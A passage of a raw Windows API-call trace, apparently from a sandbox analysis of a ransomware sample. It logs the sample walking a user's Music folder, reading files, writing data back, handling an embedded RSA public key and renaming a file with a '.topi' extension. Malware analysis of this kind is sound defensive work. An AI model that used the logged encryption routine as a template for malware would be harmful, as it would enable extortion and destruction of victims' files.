(HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.748] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.748] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f70 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f88 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f58 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4fa0 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.749] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.749] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f70 | out: hHeap=0x680000) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f70 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f70 | out: hHeap=0x680000) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.750] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.750] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fa0 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f88 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f58 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb8d8 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.751] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x841d, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x841d, lpOverlapped=0x0) returned 1 [0097.751] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.751] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x8422, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.751] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.752] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.752] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.752] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.752] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.752] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.752] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.752] CloseHandle (hObject=0x6a8) returned 1 [0097.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317eb10 [0097.753] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0097.753] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0097.753] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\o36gIUh7Ffd1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\o36giuh7ffd1.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\o36gIUh7Ffd1.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\o36giuh7ffd1.wav.topi")) returned 1 [0097.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.754] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.754] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.755] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x68bb1e60, ftCreationTime.dwHighDateTime=0x1d5c039, ftLastAccessTime.dwLowDateTime=0x7777060, ftLastAccessTime.dwHighDateTime=0x1d5b8e4, ftLastWriteTime.dwLowDateTime=0x7777060, ftLastWriteTime.dwHighDateTime=0x1d5b8e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qiN1EL4yYUSIfbrJyDb6", cAlternateFileName="QIN1EL~1")) returned 1 [0097.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317eb10 [0097.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ed08 [0097.755] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f1a0 [0097.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ed08 | out: hHeap=0x680000) returned 1 [0097.755] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317eb10 | out: hHeap=0x680000) returned 1 [0097.755] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143fd680, ftCreationTime.dwHighDateTime=0x1d5c347, ftLastAccessTime.dwLowDateTime=0x3d8c3f20, ftLastAccessTime.dwHighDateTime=0x1d5c54e, ftLastWriteTime.dwLowDateTime=0x3d8c3f20, ftLastWriteTime.dwHighDateTime=0x1d5c54e, nFileSizeHigh=0x0, nFileSizeLow=0x79a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zIACoRilvHH.mp3", cAlternateFileName="ZIACOR~1.MP3")) returned 1 [0097.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.756] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0097.756] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.756] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\zIACoRilvHH.mp3") returned=".mp3" [0097.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\zIACoRilvHH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\ziacorilvhh.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.756] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=31138) returned 1 [0097.756] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.759] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x797c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.759] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.760] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.760] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.760] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x79a2, lpOverlapped=0x0) returned 1 [0097.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.760] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.760] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.760] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0097.761] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.761] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.761] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.761] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.761] GetLastError () returned 0x0 [0097.761] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.761] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0097.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.761] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.761] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.761] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.761] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.761] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x79a0) returned 0x9a06a00 [0097.762] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb8d8 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f40 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb920 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f58 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f88 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fa0 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.762] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f88 | out: hHeap=0x680000) returned 1 [0097.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fa0 | out: hHeap=0x680000) returned 1 [0097.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.762] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4fa0 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4f88 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.762] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fa0 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: 